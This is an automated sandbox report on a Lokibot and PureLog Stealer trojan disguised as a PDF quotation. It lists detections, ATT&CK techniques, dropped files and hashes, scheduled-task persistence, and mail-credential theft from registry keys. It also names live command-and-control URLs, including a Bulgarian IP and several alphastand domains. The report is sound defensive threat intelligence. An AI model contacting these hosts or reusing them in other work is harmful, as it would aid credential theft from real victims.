Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Quotation2025-0107pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: PopPassword		13_2_0040D069
Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	Code function: SmtpPassword		13_2_0040D069

Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4d3bea8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4cdd688.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1749098659.000000000245E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cca880.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cea8a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cea8a0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4ae8e90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.9a00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.mexnJkivovwH.exe.3cca880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation2025-0107pdf.exe.4b08eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1720797556.0000000009A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1751386297.0000000003CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1714510226.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	42 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation2025-0107pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\mexnJkivovwH.exe	24%	ReversingLabs	Win32.Ransomware.Loki

Source	Detection	Scanner	Label	Link
http://94.156.177.41/mars/five/fre.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://94.156.177.41/mars/five/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.ibsensoftware.com/	mexnJkivovwH.exe, mexnJkivovwH.exe, 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.tiro.com	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.dr	false	high
http://www.carterandcone.coml	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Quotation2025-0107pdf.exe, 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, mexnJkivovwH.exe, 00000009.00000002.1749098659.0000000002449000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585262
Start date and time:	2025-01-07 12:31:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation2025-0107pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/17@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 103 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:31:56	API Interceptor	129x Sleep call for process: Quotation2025-0107pdf.exe modified
06:31:58	API Interceptor	39x Sleep call for process: powershell.exe modified
06:32:01	API Interceptor	1x Sleep call for process: mexnJkivovwH.exe modified
11:32:00	Task Scheduler	Run new task: mexnJkivovwH path: C:\Users\user\AppData\Roaming\mexnJkivovwH.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	ZsRFRjkt9q.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/alpha/five/fre.php
	0yWVteGq5T.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	CLOSURE DATE FOR THE YEAR.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/kings/five/fre.php
	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	Kloki.m68k.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	Kloki.arm7.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	Kloki.mpsl.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	Kloki.ppc.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	Kloki.spc.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.mips.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	Kloki.arm5.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	Kloki.arm4.elf	Get hash	malicious	Mirai	Browse	83.222.191.90
	mips.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	ppc.elf	Get hash	malicious	Unknown	Browse	83.222.191.90

Process:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mexnJkivovwH.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\mexnJkivovwH.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	F9B7CF60C22DBE6B73266580FFD54629
SHA1:	05ED734C0A5EF2ECD025D4E39321ECDC96612623
SHA-256:	880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
SHA-512:	F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mecof2w.g3s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsvli1cg.pqa.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3i03ykx.xky.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khcjshbf.h4v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldjobeas.vcx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhvh1cts.kar.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3e3l2fg.y1h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xztlvonk.io5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp2404.tmp

Download File

Process:	C:\Users\user\Desktop\Quotation2025-0107pdf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.109490627150337
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta4+xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT1yv
MD5:	224FCB103E17065CEFD6151E048226D7
SHA1:	236687AFABE3832DC5F1C32C87B9D0CD17AE046D
SHA-256:	990A26A889F82959DF42AD1979EAD9F9E1DD923E98B53E53D9EEF07E4374156D
